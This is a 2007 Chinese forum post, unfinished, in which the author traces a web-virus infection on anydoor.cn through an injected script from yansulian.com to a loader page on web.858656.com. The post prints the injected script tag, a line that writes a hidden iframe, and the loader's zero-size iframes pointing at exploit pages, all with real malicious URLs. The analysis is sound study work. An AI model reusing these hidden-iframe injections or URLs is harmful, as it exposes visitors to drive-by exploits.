好久没遇到网页病毒了,今天在浏览任意门网站的时候(为什么会浏览这个网站呢?因为很好奇某篇文章中提到的任意门是个什么高级东西,结果后来才反应过来别人说的是机器猫的任意门=。=),Mcafee跳了出来,报告有毒,让我兴奋不已。于是便有了下面这篇文章,希望同对这方面有兴趣的同学一起学习~
特别说明:本帖中涉及的网址或者代码都有一定危险性
后面提及的exe文件非常危险,请不要在重要的机器上运行!
网址:复制内容到剪贴板
代码:
http://www.anydoor.cn进入后,杀毒软件就有反应了。报告的页面是002.htm(VBS/Psyme),1.jpg(Exploit-ANIfile.c),okkt.js(JS/Exploit-Xunlei)
到底是哪段代码引起的呢?根据经验,一般都是iframe嵌套另一个网页或者js代码。
然而我并没有很容易的就找到是哪段代码有问题。我把网页保存到本地,一边删掉正常的代码,一边刷新,看杀软的反应。最后确定是这段引起的:
复制内容到剪贴板
代码:
<script language="JavaScript1.1" src=http://www.yansulian.com/vdonglink.asp?user=zjdysl&classid=1&style=3></script>然而单独在浏览器中打开
复制内容到剪贴板
代码:
http://www.yansulian.com/vdonglink.asp?user=zjdysl&classid=1&style=3和
复制内容到剪贴板
代码:
http://www.yansulian.com/vdonglink.asp杀软也没报,查看源文件,也并没什么特别的。我接着打开:
复制内容到剪贴板
代码:
http://www.yansulian.com查看网页源文件,看到有这么一段:
复制内容到剪贴板
代码:
document.writeln("<iframe src=http:\/\/web.858656.com\/113\/ height=\"0\" width=\"100\"><\/iframe>");这下好了,找到最先想要的iframe了,网址是:
复制内容到剪贴板
代码:
http://web.858656.com/113这下在浏览器中打开它杀毒的就跳出来了。
这个网页的源文件如下:
复制内容到剪贴板
代码:
<html><TITLE>index</TITLE><BODY>
<iframe src=http://web.858656.com/113/111/001.htm width=50 height=0></iframe>
<iframe src=http://web.858656.com/113/222/002.htm width=0 height=0></iframe>
<iframe src=http://web.858656.com/113/333/003.htm width=0 height=0></iframe>
<iframe src=http://web.858656.com/113/xl/ok.asp width=0 height=0></iframe>
</body></html>
<script src='http://s2.cnzz.com/stat.php?id=416536&web_id=416536' language='JavaScript' charset='gb2312'></script>OK,找到我们需要的002.htm了
我们接下来逐个查看001.htm ,002.htm,003.htm,以及ok.asp
最下面的那个脚本是个流量统计。不用管。
[待续]
[
本帖最后由 Subaru 于 2007-10-6 13:16 编辑 ]